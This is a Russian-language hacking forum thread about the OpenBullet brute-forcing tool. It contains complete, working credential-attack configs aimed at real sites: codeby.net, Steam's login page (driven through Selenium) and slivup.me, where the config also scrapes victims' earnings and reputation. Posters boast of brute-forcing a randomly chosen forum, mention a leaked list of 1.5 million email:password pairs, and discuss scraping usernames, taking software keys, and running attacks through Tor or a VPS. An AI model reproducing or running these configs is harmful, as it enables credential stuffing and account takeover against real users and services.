Soft OpenBullet (Brute)

Сайт программы Buller

Программа для веб брута с открытым исходным кодом. Может не только брутить )))

Пример под форум codeby:

REQUEST GET "https://codeby.net/"

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

PARSE "<SOURCE>" LR "xfToken\" value=\"" "\"" -> VAR "token"

#Login REQUEST POST "https://codeby.net/login/login"
  CONTENT "login=<USERNAME>&password=<PASSWORD>&remember=1&_xfRedirect=https%3A%2F%2Fcodeby.net%2F&_xfToken=<token>"
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

KEYCHECK
  KEYCHAIN Success OR
    KEY "Настройки"
  KEYCHAIN Failure OR
    KEY "Войти"

 

[yky]

Решил протестировать работу программы в купе с Selenium WebDriver.
Может кому пригодится )
Брут steam,чекер не стал делать:

Steam

BROWSERACTION Open

NAVIGATE "https://store.steampowered.com/login/"

#User ELEMENTACTION XPath "/html/body/div[1]/div[7]/div[4]/div[2]/div[2]/div/div/div[1]/div[1]/form/div[1]/input"
  SendKeys "<USERNAME>"

#Pass ELEMENTACTION XPath "/html/body/div[1]/div[7]/div[4]/div[2]/div[2]/div/div/div[1]/div[1]/form/div[2]/input"
  SendKeys "<PASSWORD>"

#Submit ELEMENTACTION XPath "//*[@id=\"login_btn_signin\"]/button/span"
  Click "<botton>"

#Delay FUNCTION Delay "2000"

#FAIL ELEMENTACTION XPath "/html/body/div[1]/div[7]/div[4]/div[2]/div[1]"
  GetText -> CAP "NOT"

#YES ELEMENTACTION XPath "/html/body/div[1]/div[7]/div[1]/div/div[3]/div/div[2]/div[1]/span[2]/img"
  GetText -> CAP "FUN"

KEYCHECK
  KEYCHAIN Failure OR
    KEY "<NOT>" Contains ""
  KEYCHAIN Success OR
    KEY "<FUN>" Exists

BROWSERACTION Quit

Решил так же проверить,а правда что многие используют пароли - qwerty
Рандомно выбрал форум и пробежался )))

slivup.me

REQUEST GET "https://slivup.me/index.php?app=core&module=global&section=login&do=process"

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

PARSE "<SOURCE>" LR "auth_key' value='" "' /" -> VAR "KEY"

#Login REQUEST POST "https://slivup.me/index.php?app=core&module=global&section=login&do=process"
  CONTENT "auth_key=<KEY>&referer=https%3A%2F%2Fslivup.me%2F&ips_username=<USERNAME>&ips_password=<PASSWORD>"
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

KEYCHECK
  KEYCHAIN Success OR
    KEY "Выход"
  KEYCHAIN Failure OR
    KEY "Логин или пароль неверны."

#Money PARSE "<SOURCE>" LR "Ваш заработок FPS'>" "." CreateEmpty=FALSE -> CAP "Деньги"

#link PARSE "<SOURCE>" LR "user_link' href=\"https://slivup.me/user/" "/\"" -> VAR "LINK"

REQUEST GET "https://slivup.me/user/<LINK>/"

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

#Reputacia PARSE "<SOURCE>" LR "reputation zero' data-tooltip=\"" "\">" CreateEmpty=FALSE -> CAP "Репутация"

Конфиг так же парсит количество денег и репу

Как оказалось даже премы там с паролями вида - 123456789 )))
P.S. В личке одного товарища лежало 1.5 ляма почта:пасс -

Ссылка скрыта от гостей

 

[pedro]

Извини за нубский вопрос, тысячу лет не пользовался брутерами А где ты логины взял?

 

[yky]

Парсинг сайта не кто не отменял )
На Ксени логины это ники,а программа за минуты две Выдала результат

 

[pedro]

Парсинг сайта не кто не отменял )

эт ясно ) так а чем парсишь? ) в смысле, заделись самим парсером

 

[yky]

Да,программа может не только брутить. Я ей накрутку делаю иногда )

Возможностей автоматизировать много чего можно
Например недавно своеобразный генератор рандомных ключей,с сайта сливал ключи к офису и окнам.

 

[yakser64rus]

На Linux как то возможно его запустить? И прокси из Tor прикрутить туда как нибудь?)

 

[yky]

На Linux как то возможно его запустить? И прокси из Tor прикрутить туда как нибудь?)

Linux => wine,tor => можно,но зачем?

 

[yakser64rus]

Чтобы брутить на VPS с Linux. Через wine у меня не запускается

 

[moryak777]

Да,программа может не только брутить. Я ей накрутку делаю иногда )

Возможностей автоматизировать много чего можно
Например недавно своеобразный генератор рандомных ключей,с сайта сливал ключи к офису и окнам.

не подскажешь где почитать о накрутке этой прогой? не знал что ТАКОЙ годнотой пользуюсь (только для брута)

 

[yky]

не подскажешь где почитать о накрутке этой прогой? не знал что ТАКОЙ годнотой пользуюсь (только для брута)

На офф сайте есть вся информация, инструмент универсальны. В разработке 2 версия уже.
Да и не рассказать в двух словах все возможности,такие как использование селениум и написание своего кода в программе.

 

[REwERS]

В описании к программе на github требуется framework 4.7.2. Все в наличии но прога не заводится.
Поставил 4.8 тот же результат.
Система: Windows 7 x64. Что-то может быть еще надо доставить. Помогите пожалуйста советом.

 

[yky]

Причин может быть много,например из за плагинов.
Ошибки в Log.txt посмотри.
Попробуй более раннею версию программы или если есть знания собрать из исходников.
Может проблема в самих Окнах ))))

 

[REwERS]

Спасибо за быстрый ответ. Лог к сожалению пуст.

Причин может быть много,например из за плагинов.
Ошибки в Log.txt посмотри.
Попробуй более раннею версию программы или если есть знания собрать из исходников.
Может проблема в самих Окнах ))))

Спасибо за быстрый ответ. Лог к сожалению пуст. Попробовал ранние версии не помогло. Silver
Bullet также не запускается. То что с виндой что-то не так я понял. Но что может помочь? Попробую для начала переустановить framework-и Microsoft Visual C++ и отпишусь что выйдет.
P.S. С такой проблемой уже сталкивались

Ссылка скрыта от гостей

но причина не ясна.

 

[moryak777]

эт ясно ) так а чем парсишь? ) в смысле, заделись самим парсером

Ссылка скрыта от гостей

ничё не понятно, но ооочень интересно!!!)

 

[Tipks]

Сравнивал кто то keeper'ом?